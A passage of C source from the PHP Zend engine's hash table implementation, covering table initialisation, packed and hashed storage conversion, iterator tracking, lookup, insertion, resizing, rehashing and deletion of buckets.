ZEND_API void ZEND_FASTCALL zend_hash_real_init(HashTable *ht, zend_bool packed)
{
IS_CONSISTENT(ht);
HT_ASSERT(GC_REFCOUNT(ht) == 1);
zend_hash_real_init_ex(ht, packed);
}
ZEND_API void ZEND_FASTCALL zend_hash_packed_to_hash(HashTable *ht)
{
void *new_data, *old_data = HT_GET_DATA_ADDR(ht);
Bucket *old_buckets = ht->arData;
HT_ASSERT(GC_REFCOUNT(ht) == 1);
HANDLE_BLOCK_INTERRUPTIONS();
ht->u.flags &= ~HASH_FLAG_PACKED;
new_data = pemalloc(HT_SIZE_EX(ht->nTableSize, -ht->nTableSize), (ht)->u.flags & HASH_FLAG_PERSISTENT);
ht->nTableMask = -ht->nTableSize;
HT_SET_DATA_ADDR(ht, new_data);
memcpy(ht->arData, old_buckets, sizeof(Bucket) * ht->nNumUsed);
pefree(old_data, (ht)->u.flags & HASH_FLAG_PERSISTENT);
zend_hash_rehash(ht);
HANDLE_UNBLOCK_INTERRUPTIONS();
}
ZEND_API void ZEND_FASTCALL zend_hash_to_packed(HashTable *ht)
{
void *new_data, *old_data = HT_GET_DATA_ADDR(ht);
Bucket *old_buckets = ht->arData;
HT_ASSERT(GC_REFCOUNT(ht) == 1);
HANDLE_BLOCK_INTERRUPTIONS();
new_data = pemalloc(HT_SIZE_EX(ht->nTableSize, HT_MIN_MASK), (ht)->u.flags & HASH_FLAG_PERSISTENT);
ht->u.flags |= HASH_FLAG_PACKED | HASH_FLAG_STATIC_KEYS;
ht->nTableMask = HT_MIN_MASK;
HT_SET_DATA_ADDR(ht, new_data);
HT_HASH_RESET_PACKED(ht);
memcpy(ht->arData, old_buckets, sizeof(Bucket) * ht->nNumUsed);
pefree(old_data, (ht)->u.flags & HASH_FLAG_PERSISTENT);
HANDLE_UNBLOCK_INTERRUPTIONS();
}
ZEND_API void ZEND_FASTCALL _zend_hash_init_ex(HashTable *ht, uint32_t nSize, dtor_func_t pDestructor, zend_bool persistent, zend_bool bApplyProtection ZEND_FILE_LINE_DC)
{
_zend_hash_init(ht, nSize, pDestructor, persistent ZEND_FILE_LINE_RELAY_CC);
if (!bApplyProtection) {
ht->u.flags &= ~HASH_FLAG_APPLY_PROTECTION;
}
}
ZEND_API void ZEND_FASTCALL zend_hash_extend(HashTable *ht, uint32_t nSize, zend_bool packed)
{
HT_ASSERT(GC_REFCOUNT(ht) == 1);
if (nSize == 0) return;
if (UNEXPECTED(!((ht)->u.flags & HASH_FLAG_INITIALIZED))) {
if (nSize > ht->nTableSize) {
ht->nTableSize = zend_hash_check_size(nSize);
}
zend_hash_check_init(ht, packed);
} else {
if (packed) {
ZEND_ASSERT(ht->u.flags & HASH_FLAG_PACKED);
if (nSize > ht->nTableSize) {
HANDLE_BLOCK_INTERRUPTIONS();
ht->nTableSize = zend_hash_check_size(nSize);
HT_SET_DATA_ADDR(ht, perealloc2(HT_GET_DATA_ADDR(ht), HT_SIZE(ht), HT_USED_SIZE(ht), ht->u.flags & HASH_FLAG_PERSISTENT));
HANDLE_UNBLOCK_INTERRUPTIONS();
}
} else {
ZEND_ASSERT(!(ht->u.flags & HASH_FLAG_PACKED));
if (nSize > ht->nTableSize) {
void *new_data, *old_data = HT_GET_DATA_ADDR(ht);
Bucket *old_buckets = ht->arData;
nSize = zend_hash_check_size(nSize);
HANDLE_BLOCK_INTERRUPTIONS();
new_data = pemalloc(HT_SIZE_EX(nSize, -nSize), ht->u.flags & HASH_FLAG_PERSISTENT);
ht->nTableSize = nSize;
ht->nTableMask = -ht->nTableSize;
HT_SET_DATA_ADDR(ht, new_data);
memcpy(ht->arData, old_buckets, sizeof(Bucket) * ht->nNumUsed);
pefree(old_data, ht->u.flags & HASH_FLAG_PERSISTENT);
zend_hash_rehash(ht);
HANDLE_UNBLOCK_INTERRUPTIONS();
}
}
}
}
static uint32_t zend_array_recalc_elements(HashTable *ht)
{
zval *val;
uint32_t num = ht->nNumOfElements;
ZEND_HASH_FOREACH_VAL(ht, val) {
if (Z_TYPE_P(val) == IS_UNDEF) continue;
if (Z_TYPE_P(val) == IS_INDIRECT) {
if (UNEXPECTED(Z_TYPE_P(Z_INDIRECT_P(val)) == IS_UNDEF)) {
num--;
}
}
} ZEND_HASH_FOREACH_END();
return num;
}
/* }}} */
ZEND_API uint32_t zend_array_count(HashTable *ht)
{
uint32_t num;
if (UNEXPECTED(ht->u.v.flags & HASH_FLAG_HAS_EMPTY_IND)) {
num = zend_array_recalc_elements(ht);
if (UNEXPECTED(ht->nNumOfElements == num)) {
ht->u.v.flags &= ~HASH_FLAG_HAS_EMPTY_IND;
}
} else if (UNEXPECTED(ht == &EG(symbol_table))) {
num = zend_array_recalc_elements(ht);
} else {
num = zend_hash_num_elements(ht);
}
return num;
}
/* }}} */
ZEND_API void ZEND_FASTCALL zend_hash_set_apply_protection(HashTable *ht, zend_bool bApplyProtection)
{
if (bApplyProtection) {
ht->u.flags |= HASH_FLAG_APPLY_PROTECTION;
} else {
ht->u.flags &= ~HASH_FLAG_APPLY_PROTECTION;
}
}
ZEND_API uint32_t ZEND_FASTCALL zend_hash_iterator_add(HashTable *ht, HashPosition pos)
{
HashTableIterator *iter = EG(ht_iterators);
HashTableIterator *end = iter + EG(ht_iterators_count);
uint32_t idx;
if (EXPECTED(ht->u.v.nIteratorsCount != 255)) {
ht->u.v.nIteratorsCount++;
}
while (iter != end) {
if (iter->ht == NULL) {
iter->ht = ht;
iter->pos = pos;
idx = iter - EG(ht_iterators);
if (idx + 1 > EG(ht_iterators_used)) {
EG(ht_iterators_used) = idx + 1;
}
return idx;
}
iter++;
}
if (EG(ht_iterators) == EG(ht_iterators_slots)) {
EG(ht_iterators) = emalloc(sizeof(HashTableIterator) * (EG(ht_iterators_count) + 8));
memcpy(EG(ht_iterators), EG(ht_iterators_slots), sizeof(HashTableIterator) * EG(ht_iterators_count));
} else {
EG(ht_iterators) = erealloc(EG(ht_iterators), sizeof(HashTableIterator) * (EG(ht_iterators_count) + 8));
}
iter = EG(ht_iterators) + EG(ht_iterators_count);
EG(ht_iterators_count) += 8;
iter->ht = ht;
iter->pos = pos;
memset(iter + 1, 0, sizeof(HashTableIterator) * 7);
idx = iter - EG(ht_iterators);
EG(ht_iterators_used) = idx + 1;
return idx;
}
ZEND_API HashPosition ZEND_FASTCALL zend_hash_iterator_pos(uint32_t idx, HashTable *ht)
{
HashTableIterator *iter = EG(ht_iterators) + idx;
ZEND_ASSERT(idx != (uint32_t)-1);
if (iter->pos == HT_INVALID_IDX) {
return HT_INVALID_IDX;
} else if (UNEXPECTED(iter->ht != ht)) {
if (EXPECTED(iter->ht) && EXPECTED(iter->ht != HT_POISONED_PTR)
&& EXPECTED(iter->ht->u.v.nIteratorsCount != 255)) {
iter->ht->u.v.nIteratorsCount--;
}
if (EXPECTED(ht->u.v.nIteratorsCount != 255)) {
ht->u.v.nIteratorsCount++;
}
iter->ht = ht;
iter->pos = ht->nInternalPointer;
}
return iter->pos;
}
ZEND_API HashPosition ZEND_FASTCALL zend_hash_iterator_pos_ex(uint32_t idx, zval *array)
{
HashTable *ht = Z_ARRVAL_P(array);
HashTableIterator *iter = EG(ht_iterators) + idx;
ZEND_ASSERT(idx != (uint32_t)-1);
if (iter->pos == HT_INVALID_IDX) {
return HT_INVALID_IDX;
} else if (UNEXPECTED(iter->ht != ht)) {
if (EXPECTED(iter->ht) && EXPECTED(iter->ht != HT_POISONED_PTR)
&& EXPECTED(iter->ht->u.v.nIteratorsCount != 255)) {
iter->ht->u.v.nIteratorsCount--;
}
SEPARATE_ARRAY(array);
ht = Z_ARRVAL_P(array);
if (EXPECTED(ht->u.v.nIteratorsCount != 255)) {
ht->u.v.nIteratorsCount++;
}
iter->ht = ht;
iter->pos = ht->nInternalPointer;
}
return iter->pos;
}
ZEND_API void ZEND_FASTCALL zend_hash_iterator_del(uint32_t idx)
{
HashTableIterator *iter = EG(ht_iterators) + idx;
ZEND_ASSERT(idx != (uint32_t)-1);
if (EXPECTED(iter->ht) && EXPECTED(iter->ht != HT_POISONED_PTR)
&& EXPECTED(iter->ht->u.v.nIteratorsCount != 255)) {
iter->ht->u.v.nIteratorsCount--;
}
iter->ht = NULL;
if (idx == EG(ht_iterators_used) - 1) {
while (idx > 0 && EG(ht_iterators)[idx - 1].ht == NULL) {
idx--;
}
EG(ht_iterators_used) = idx;
}
}
static zend_never_inline void ZEND_FASTCALL _zend_hash_iterators_remove(HashTable *ht)
{
HashTableIterator *iter = EG(ht_iterators);
HashTableIterator *end = iter + EG(ht_iterators_used);
while (iter != end) {
if (iter->ht == ht) {
iter->ht = HT_POISONED_PTR;
}
iter++;
}
}
static zend_always_inline void zend_hash_iterators_remove(HashTable *ht)
{
if (UNEXPECTED(ht->u.v.nIteratorsCount)) {
_zend_hash_iterators_remove(ht);
}
}
ZEND_API HashPosition ZEND_FASTCALL zend_hash_iterators_lower_pos(HashTable *ht, HashPosition start)
{
HashTableIterator *iter = EG(ht_iterators);
HashTableIterator *end = iter + EG(ht_iterators_used);
HashPosition res = HT_INVALID_IDX;
while (iter != end) {
if (iter->ht == ht) {
if (iter->pos >= start && iter->pos < res) {
res = iter->pos;
}
}
iter++;
}
return res;
}
ZEND_API void ZEND_FASTCALL _zend_hash_iterators_update(HashTable *ht, HashPosition from, HashPosition to)
{
HashTableIterator *iter = EG(ht_iterators);
HashTableIterator *end = iter + EG(ht_iterators_used);
while (iter != end) {
if (iter->ht == ht && iter->pos == from) {
iter->pos = to;
}
iter++;
}
}
static zend_always_inline Bucket *zend_hash_find_bucket(const HashTable *ht, zend_string *key)
{
zend_ulong h;
uint32_t nIndex;
uint32_t idx;
Bucket *p, *arData;
h = zend_string_hash_val(key);
arData = ht->arData;
nIndex = h | ht->nTableMask;
idx = HT_HASH_EX(arData, nIndex);
while (EXPECTED(idx != HT_INVALID_IDX)) {
p = HT_HASH_TO_BUCKET_EX(arData, idx);
if (EXPECTED(p->key == key)) { /* check for the same interned string */
return p;
} else if (EXPECTED(p->h == h) &&
EXPECTED(p->key) &&
EXPECTED(ZSTR_LEN(p->key) == ZSTR_LEN(key)) &&
EXPECTED(memcmp(ZSTR_VAL(p->key), ZSTR_VAL(key), ZSTR_LEN(key)) == 0)) {
return p;
}
idx = Z_NEXT(p->val);
}
return NULL;
}
static zend_always_inline Bucket *zend_hash_str_find_bucket(const HashTable *ht, const char *str, size_t len, zend_ulong h)
{
uint32_t nIndex;
uint32_t idx;
Bucket *p, *arData;
arData = ht->arData;
nIndex = h | ht->nTableMask;
idx = HT_HASH_EX(arData, nIndex);
while (idx != HT_INVALID_IDX) {
ZEND_ASSERT(idx < HT_IDX_TO_HASH(ht->nTableSize));
p = HT_HASH_TO_BUCKET_EX(arData, idx);
if ((p->h == h)
&& p->key
&& (ZSTR_LEN(p->key) == len)
&& !memcmp(ZSTR_VAL(p->key), str, len)) {
return p;
}
idx = Z_NEXT(p->val);
}
return NULL;
}
static zend_always_inline Bucket *zend_hash_index_find_bucket(const HashTable *ht, zend_ulong h)
{
uint32_t nIndex;
uint32_t idx;
Bucket *p, *arData;
arData = ht->arData;
nIndex = h | ht->nTableMask;
idx = HT_HASH_EX(arData, nIndex);
while (idx != HT_INVALID_IDX) {
ZEND_ASSERT(idx < HT_IDX_TO_HASH(ht->nTableSize));
p = HT_HASH_TO_BUCKET_EX(arData, idx);
if (p->h == h && !p->key) {
return p;
}
idx = Z_NEXT(p->val);
}
return NULL;
}
static zend_always_inline zval *_zend_hash_add_or_update_i(HashTable *ht, zend_string *key, zval *pData, uint32_t flag ZEND_FILE_LINE_DC)
{
zend_ulong h;
uint32_t nIndex;
uint32_t idx;
Bucket *p;
IS_CONSISTENT(ht);
HT_ASSERT(GC_REFCOUNT(ht) == 1);
if (UNEXPECTED(!(ht->u.flags & HASH_FLAG_INITIALIZED))) {
CHECK_INIT(ht, 0);
goto add_to_hash;
} else if (ht->u.flags & HASH_FLAG_PACKED) {
zend_hash_packed_to_hash(ht);
} else if ((flag & HASH_ADD_NEW) == 0) {
p = zend_hash_find_bucket(ht, key);
if (p) {
zval *data;
if (flag & HASH_ADD) {
if (!(flag & HASH_UPDATE_INDIRECT)) {
return NULL;
}
ZEND_ASSERT(&p->val != pData);
data = &p->val;
if (Z_TYPE_P(data) == IS_INDIRECT) {
data = Z_INDIRECT_P(data);
if (Z_TYPE_P(data) != IS_UNDEF) {
return NULL;
}
} else {
return NULL;
}
} else {
ZEND_ASSERT(&p->val != pData);
data = &p->val;
if ((flag & HASH_UPDATE_INDIRECT) && Z_TYPE_P(data) == IS_INDIRECT) {
data = Z_INDIRECT_P(data);
}
}
HANDLE_BLOCK_INTERRUPTIONS();
if (ht->pDestructor) {
ht->pDestructor(data);
}
ZVAL_COPY_VALUE(data, pData);
HANDLE_UNBLOCK_INTERRUPTIONS();
return data;
}
}
ZEND_HASH_IF_FULL_DO_RESIZE(ht); /* If the Hash table is full, resize it */
add_to_hash:
HANDLE_BLOCK_INTERRUPTIONS();
idx = ht->nNumUsed++;
ht->nNumOfElements++;
if (ht->nInternalPointer == HT_INVALID_IDX) {
ht->nInternalPointer = idx;
}
zend_hash_iterators_update(ht, HT_INVALID_IDX, idx);
p = ht->arData + idx;
p->key = key;
if (!ZSTR_IS_INTERNED(key)) {
zend_string_addref(key);
ht->u.flags &= ~HASH_FLAG_STATIC_KEYS;
zend_string_hash_val(key);
}
p->h = h = ZSTR_H(key);
ZVAL_COPY_VALUE(&p->val, pData);
nIndex = h | ht->nTableMask;
Z_NEXT(p->val) = HT_HASH(ht, nIndex);
HT_HASH(ht, nIndex) = HT_IDX_TO_HASH(idx);
HANDLE_UNBLOCK_INTERRUPTIONS();
return &p->val;
}
ZEND_API zval* ZEND_FASTCALL _zend_hash_add_or_update(HashTable *ht, zend_string *key, zval *pData, uint32_t flag ZEND_FILE_LINE_DC)
{
return _zend_hash_add_or_update_i(ht, key, pData, flag ZEND_FILE_LINE_RELAY_CC);
}
ZEND_API zval* ZEND_FASTCALL _zend_hash_add(HashTable *ht, zend_string *key, zval *pData ZEND_FILE_LINE_DC)
{
return _zend_hash_add_or_update_i(ht, key, pData, HASH_ADD ZEND_FILE_LINE_RELAY_CC);
}
ZEND_API zval* ZEND_FASTCALL _zend_hash_update(HashTable *ht, zend_string *key, zval *pData ZEND_FILE_LINE_DC)
{
return _zend_hash_add_or_update_i(ht, key, pData, HASH_UPDATE ZEND_FILE_LINE_RELAY_CC);
}
ZEND_API zval* ZEND_FASTCALL _zend_hash_update_ind(HashTable *ht, zend_string *key, zval *pData ZEND_FILE_LINE_DC)
{
return _zend_hash_add_or_update_i(ht, key, pData, HASH_UPDATE | HASH_UPDATE_INDIRECT ZEND_FILE_LINE_RELAY_CC);
}
ZEND_API zval* ZEND_FASTCALL _zend_hash_add_new(HashTable *ht, zend_string *key, zval *pData ZEND_FILE_LINE_DC)
{
return _zend_hash_add_or_update_i(ht, key, pData, HASH_ADD_NEW ZEND_FILE_LINE_RELAY_CC);
}
ZEND_API zval* ZEND_FASTCALL _zend_hash_str_add_or_update(HashTable *ht, const char *str, size_t len, zval *pData, uint32_t flag ZEND_FILE_LINE_DC)
{
zend_string *key = zend_string_init(str, len, ht->u.flags & HASH_FLAG_PERSISTENT);
zval *ret = _zend_hash_add_or_update_i(ht, key, pData, flag ZEND_FILE_LINE_RELAY_CC);
zend_string_release(key);
return ret;
}
ZEND_API zval* ZEND_FASTCALL _zend_hash_str_update(HashTable *ht, const char *str, size_t len, zval *pData ZEND_FILE_LINE_DC)
{
zend_string *key = zend_string_init(str, len, ht->u.flags & HASH_FLAG_PERSISTENT);
zval *ret = _zend_hash_add_or_update_i(ht, key, pData, HASH_UPDATE ZEND_FILE_LINE_RELAY_CC);
zend_string_release(key);
return ret;
}
ZEND_API zval* ZEND_FASTCALL _zend_hash_str_update_ind(HashTable *ht, const char *str, size_t len, zval *pData ZEND_FILE_LINE_DC)
{
zend_string *key = zend_string_init(str, len, ht->u.flags & HASH_FLAG_PERSISTENT);
zval *ret = _zend_hash_add_or_update_i(ht, key, pData, HASH_UPDATE | HASH_UPDATE_INDIRECT ZEND_FILE_LINE_RELAY_CC);
zend_string_release(key);
return ret;
}
ZEND_API zval* ZEND_FASTCALL _zend_hash_str_add(HashTable *ht, const char *str, size_t len, zval *pData ZEND_FILE_LINE_DC)
{
zend_string *key = zend_string_init(str, len, ht->u.flags & HASH_FLAG_PERSISTENT);
zval *ret = _zend_hash_add_or_update_i(ht, key, pData, HASH_ADD ZEND_FILE_LINE_RELAY_CC);
zend_string_release(key);
return ret;
}
ZEND_API zval* ZEND_FASTCALL _zend_hash_str_add_new(HashTable *ht, const char *str, size_t len, zval *pData ZEND_FILE_LINE_DC)
{
zend_string *key = zend_string_init(str, len, ht->u.flags & HASH_FLAG_PERSISTENT);
zval *ret = _zend_hash_add_or_update_i(ht, key, pData, HASH_ADD_NEW ZEND_FILE_LINE_RELAY_CC);
zend_string_delref(key);
return ret;
}
ZEND_API zval* ZEND_FASTCALL zend_hash_index_add_empty_element(HashTable *ht, zend_ulong h)
{
zval dummy;
ZVAL_NULL(&dummy);
return zend_hash_index_add(ht, h, &dummy);
}
ZEND_API zval* ZEND_FASTCALL zend_hash_add_empty_element(HashTable *ht, zend_string *key)
{
zval dummy;
ZVAL_NULL(&dummy);
return zend_hash_add(ht, key, &dummy);
}
ZEND_API zval* ZEND_FASTCALL zend_hash_str_add_empty_element(HashTable *ht, const char *str, size_t len)
{
zval dummy;
ZVAL_NULL(&dummy);
return zend_hash_str_add(ht, str, len, &dummy);
}
static zend_always_inline zval *_zend_hash_index_add_or_update_i(HashTable *ht, zend_ulong h, zval *pData, uint32_t flag ZEND_FILE_LINE_DC)
{
uint32_t nIndex;
uint32_t idx;
Bucket *p;
IS_CONSISTENT(ht);
HT_ASSERT(GC_REFCOUNT(ht) == 1);
if (UNEXPECTED(!(ht->u.flags & HASH_FLAG_INITIALIZED))) {
CHECK_INIT(ht, h < ht->nTableSize);
if (h < ht->nTableSize) {
p = ht->arData + h;
goto add_to_packed;
}
goto add_to_hash;
} else if (ht->u.flags & HASH_FLAG_PACKED) {
if (h < ht->nNumUsed) {
p = ht->arData + h;
if (Z_TYPE(p->val) != IS_UNDEF) {
if (flag & HASH_ADD) {
return NULL;
}
if (ht->pDestructor) {
ht->pDestructor(&p->val);
}
ZVAL_COPY_VALUE(&p->val, pData);
if ((zend_long)h >= (zend_long)ht->nNextFreeElement) {
ht->nNextFreeElement = h < ZEND_LONG_MAX ? h + 1 : ZEND_LONG_MAX;
}
return &p->val;
} else { /* we have to keep the order :( */
goto convert_to_hash;
}
} else if (EXPECTED(h < ht->nTableSize)) {
p = ht->arData + h;
} else if ((h >> 1) < ht->nTableSize &&
(ht->nTableSize >> 1) < ht->nNumOfElements) {
zend_hash_packed_grow(ht);
p = ht->arData + h;
} else {
goto convert_to_hash;
}
add_to_packed:
HANDLE_BLOCK_INTERRUPTIONS();
/* incremental initialization of empty Buckets */
if ((flag & (HASH_ADD_NEW|HASH_ADD_NEXT)) == (HASH_ADD_NEW|HASH_ADD_NEXT)) {
ht->nNumUsed = h + 1;
} else if (h >= ht->nNumUsed) {
if (h > ht->nNumUsed) {
Bucket *q = ht->arData + ht->nNumUsed;
while (q != p) {
ZVAL_UNDEF(&q->val);
q++;
}
}
ht->nNumUsed = h + 1;
}
ht->nNumOfElements++;
if (ht->nInternalPointer == HT_INVALID_IDX) {
ht->nInternalPointer = h;
}
zend_hash_iterators_update(ht, HT_INVALID_IDX, h);
if ((zend_long)h >= (zend_long)ht->nNextFreeElement) {
ht->nNextFreeElement = h < ZEND_LONG_MAX ? h + 1 : ZEND_LONG_MAX;
}
p->h = h;
p->key = NULL;
ZVAL_COPY_VALUE(&p->val, pData);
HANDLE_UNBLOCK_INTERRUPTIONS();
return &p->val;
convert_to_hash:
zend_hash_packed_to_hash(ht);
} else if ((flag & HASH_ADD_NEW) == 0) {
p = zend_hash_index_find_bucket(ht, h);
if (p) {
if (flag & HASH_ADD) {
return NULL;
}
ZEND_ASSERT(&p->val != pData);
HANDLE_BLOCK_INTERRUPTIONS();
if (ht->pDestructor) {
ht->pDestructor(&p->val);
}
ZVAL_COPY_VALUE(&p->val, pData);
HANDLE_UNBLOCK_INTERRUPTIONS();
if ((zend_long)h >= (zend_long)ht->nNextFreeElement) {
ht->nNextFreeElement = h < ZEND_LONG_MAX ? h + 1 : ZEND_LONG_MAX;
}
return &p->val;
}
}
ZEND_HASH_IF_FULL_DO_RESIZE(ht); /* If the Hash table is full, resize it */
add_to_hash:
HANDLE_BLOCK_INTERRUPTIONS();
idx = ht->nNumUsed++;
ht->nNumOfElements++;
if (ht->nInternalPointer == HT_INVALID_IDX) {
ht->nInternalPointer = idx;
}
zend_hash_iterators_update(ht, HT_INVALID_IDX, idx);
if ((zend_long)h >= (zend_long)ht->nNextFreeElement) {
ht->nNextFreeElement = h < ZEND_LONG_MAX ? h + 1 : ZEND_LONG_MAX;
}
p = ht->arData + idx;
p->h = h;
p->key = NULL;
nIndex = h | ht->nTableMask;
ZVAL_COPY_VALUE(&p->val, pData);
Z_NEXT(p->val) = HT_HASH(ht, nIndex);
HT_HASH(ht, nIndex) = HT_IDX_TO_HASH(idx);
HANDLE_UNBLOCK_INTERRUPTIONS();
return &p->val;
}
ZEND_API zval* ZEND_FASTCALL _zend_hash_index_add_or_update(HashTable *ht, zend_ulong h, zval *pData, uint32_t flag ZEND_FILE_LINE_DC)
{
return _zend_hash_index_add_or_update_i(ht, h, pData, flag ZEND_FILE_LINE_RELAY_CC);
}
ZEND_API zval* ZEND_FASTCALL _zend_hash_index_add(HashTable *ht, zend_ulong h, zval *pData ZEND_FILE_LINE_DC)
{
return _zend_hash_index_add_or_update_i(ht, h, pData, HASH_ADD ZEND_FILE_LINE_RELAY_CC);
}
ZEND_API zval* ZEND_FASTCALL _zend_hash_index_add_new(HashTable *ht, zend_ulong h, zval *pData ZEND_FILE_LINE_DC)
{
return _zend_hash_index_add_or_update_i(ht, h, pData, HASH_ADD | HASH_ADD_NEW ZEND_FILE_LINE_RELAY_CC);
}
ZEND_API zval* ZEND_FASTCALL _zend_hash_index_update(HashTable *ht, zend_ulong h, zval *pData ZEND_FILE_LINE_DC)
{
return _zend_hash_index_add_or_update_i(ht, h, pData, HASH_UPDATE ZEND_FILE_LINE_RELAY_CC);
}
ZEND_API zval* ZEND_FASTCALL _zend_hash_next_index_insert(HashTable *ht, zval *pData ZEND_FILE_LINE_DC)
{
return _zend_hash_index_add_or_update_i(ht, ht->nNextFreeElement, pData, HASH_ADD | HASH_ADD_NEXT ZEND_FILE_LINE_RELAY_CC);
}
ZEND_API zval* ZEND_FASTCALL _zend_hash_next_index_insert_new(HashTable *ht, zval *pData ZEND_FILE_LINE_DC)
{
return _zend_hash_index_add_or_update_i(ht, ht->nNextFreeElement, pData, HASH_ADD | HASH_ADD_NEW | HASH_ADD_NEXT ZEND_FILE_LINE_RELAY_CC);
}
static void ZEND_FASTCALL zend_hash_do_resize(HashTable *ht)
{
IS_CONSISTENT(ht);
HT_ASSERT(GC_REFCOUNT(ht) == 1);
if (ht->nNumUsed > ht->nNumOfElements + (ht->nNumOfElements >> 5)) { /* additional term is there to amortize the cost of compaction */
HANDLE_BLOCK_INTERRUPTIONS();
zend_hash_rehash(ht);
HANDLE_UNBLOCK_INTERRUPTIONS();
} else if (ht->nTableSize < HT_MAX_SIZE) { /* Let's double the table size */
void *new_data, *old_data = HT_GET_DATA_ADDR(ht);
uint32_t nSize = ht->nTableSize + ht->nTableSize;
Bucket *old_buckets = ht->arData;
HANDLE_BLOCK_INTERRUPTIONS();
new_data = pemalloc(HT_SIZE_EX(nSize, -nSize), ht->u.flags & HASH_FLAG_PERSISTENT);
ht->nTableSize = nSize;
ht->nTableMask = -ht->nTableSize;
HT_SET_DATA_ADDR(ht, new_data);
memcpy(ht->arData, old_buckets, sizeof(Bucket) * ht->nNumUsed);
pefree(old_data, ht->u.flags & HASH_FLAG_PERSISTENT);
zend_hash_rehash(ht);
HANDLE_UNBLOCK_INTERRUPTIONS();
} else {
zend_error_noreturn(E_ERROR, "Possible integer overflow in memory allocation (%zu * %zu + %zu)", ht->nTableSize * 2, sizeof(Bucket) + sizeof(uint32_t), sizeof(Bucket));
}
}
ZEND_API int ZEND_FASTCALL zend_hash_rehash(HashTable *ht)
{
Bucket *p;
uint32_t nIndex, i;
IS_CONSISTENT(ht);
if (UNEXPECTED(ht->nNumOfElements == 0)) {
if (ht->u.flags & HASH_FLAG_INITIALIZED) {
ht->nNumUsed = 0;
HT_HASH_RESET(ht);
}
return SUCCESS;
}
HT_HASH_RESET(ht);
i = 0;
p = ht->arData;
if (ht->nNumUsed == ht->nNumOfElements) {
do {
nIndex = p->h | ht->nTableMask;
Z_NEXT(p->val) = HT_HASH(ht, nIndex);
HT_HASH(ht, nIndex) = HT_IDX_TO_HASH(i);
p++;
} while (++i < ht->nNumUsed);
} else {
do {
if (UNEXPECTED(Z_TYPE(p->val) == IS_UNDEF)) {
uint32_t j = i;
Bucket *q = p;
if (EXPECTED(ht->u.v.nIteratorsCount == 0)) {
while (++i < ht->nNumUsed) {
p++;
if (EXPECTED(Z_TYPE_INFO(p->val) != IS_UNDEF)) {
ZVAL_COPY_VALUE(&q->val, &p->val);
q->h = p->h;
nIndex = q->h | ht->nTableMask;
q->key = p->key;
Z_NEXT(q->val) = HT_HASH(ht, nIndex);
HT_HASH(ht, nIndex) = HT_IDX_TO_HASH(j);
if (UNEXPECTED(ht->nInternalPointer == i)) {
ht->nInternalPointer = j;
}
q++;
j++;
}
}
} else {
uint32_t iter_pos = zend_hash_iterators_lower_pos(ht, 0);
while (++i < ht->nNumUsed) {
p++;
if (EXPECTED(Z_TYPE_INFO(p->val) != IS_UNDEF)) {
ZVAL_COPY_VALUE(&q->val, &p->val);
q->h = p->h;
nIndex = q->h | ht->nTableMask;
q->key = p->key;
Z_NEXT(q->val) = HT_HASH(ht, nIndex);
HT_HASH(ht, nIndex) = HT_IDX_TO_HASH(j);
if (UNEXPECTED(ht->nInternalPointer == i)) {
ht->nInternalPointer = j;
}
if (UNEXPECTED(i == iter_pos)) {
zend_hash_iterators_update(ht, i, j);
iter_pos = zend_hash_iterators_lower_pos(ht, iter_pos + 1);
}
q++;
j++;
}
}
}
ht->nNumUsed = j;
break;
}
nIndex = p->h | ht->nTableMask;
Z_NEXT(p->val) = HT_HASH(ht, nIndex);
HT_HASH(ht, nIndex) = HT_IDX_TO_HASH(i);
p++;
} while (++i < ht->nNumUsed);
}
return SUCCESS;
}
static zend_always_inline void _zend_hash_del_el_ex(HashTable *ht, uint32_t idx, Bucket *p, Bucket *prev)
{
HANDLE_BLOCK_INTERRUPTIONS();
if (!(ht->u.flags & HASH_FLAG_PACKED)) {
if (prev) {
Z_NEXT(prev->val) = Z_NEXT(p->val);
} else {
HT_HASH(ht, p->h | ht->nTableMask) = Z_NEXT(p->val);
}
}
if (HT_IDX_TO_HASH(ht->nNumUsed - 1) == idx) {
do {
ht->nNumUsed--;
} while (ht->nNumUsed > 0 && (UNEXPECTED(Z_TYPE(ht->arData[ht->nNumUsed-1].val) == IS_UNDEF)));
}
ht->nNumOfElements--;
if (HT_IDX_TO_HASH(ht->nInternalPointer) == idx || UNEXPECTED(ht->u.v.nIteratorsCount)) {
uint32_t new_idx;
new_idx = idx = HT_HASH_TO_IDX(idx);
while (1) {
new_idx++;
if (new_idx >= ht->nNumUsed) {
new_idx = HT_INVALID_IDX;
break;
} else if (Z_TYPE(ht->arData[new_idx].val) != IS_UNDEF) {
break;
}
}
if (ht->nInternalPointer == idx) {
ht->nInternalPointer = new_idx;
}
zend_hash_iterators_update(ht, idx, new_idx);
}
if (p->key) {
zend_string_release(p->key);
}
if (ht->pDestructor) {
zval tmp;
ZVAL_COPY_VALUE(&tmp, &p->val);
ZVAL_UNDEF(&p->val);
ht->pDestructor(&tmp);
} else {
ZVAL_UNDEF(&p->val);
}
HANDLE_UNBLOCK_INTERRUPTIONS();
}
static zend_always_inline void _zend_hash_del_el(HashTable *ht, uint32_t idx, Bucket *p)
{
Bucket *prev = NULL;
if (!(ht->u.flags & HASH_FLAG_PACKED)) {
uint32_t nIndex = p->h | ht->nTableMask;
uint32_t i = HT_HASH(ht, nIndex);
if (i != idx) {
prev = HT_HASH_TO_BUCKET(ht, i);
while (Z_NEXT(prev->val) != idx) {
i = Z_NEXT(prev->val);
prev = HT_HASH_TO_BUCKET(ht, i);
}
}
}
_zend_hash_del_el_ex(ht, idx, p, prev);
}
ZEND_API void ZEND_FASTCALL zend_hash_del_bucket(HashTable *ht, Bucket *p)
{
IS_CONSISTENT(ht);
HT_ASSERT(GC_REFCOUNT(ht) == 1);
_zend_hash_del_el(ht, HT_IDX_TO_HASH(p - ht->arData), p);
}
ZEND_API int ZEND_FASTCALL zend_hash_del(HashTable *ht, zend_string *key)
{
zend_ulong h;
uint32_t nIndex;
uint32_t idx;
Bucket *p;
Bucket *prev = NULL;
IS_CONSISTENT(ht);
HT_ASSERT(GC_REFCOUNT(ht) == 1);
h = zend_string_hash_val(key);
nIndex = h | ht->nTableMask;
idx = HT_HASH(ht, nIndex);
while (idx != HT_INVALID_IDX) {
p = HT_HASH_TO_BUCKET(ht, idx);
if ((p->key == key) ||
(p->h == h &&
p->key &&
ZSTR_LEN(p->key) == ZSTR_LEN(key) &&
memcmp(ZSTR_VAL(p->key), ZSTR_VAL(key), ZSTR_LEN(key)) == 0)) {
_zend_hash_del_el_ex(ht, idx, p, prev);
return SUCCESS;
}
prev = p;
idx = Z_NEXT(p->val);
}
return FAILURE;
}
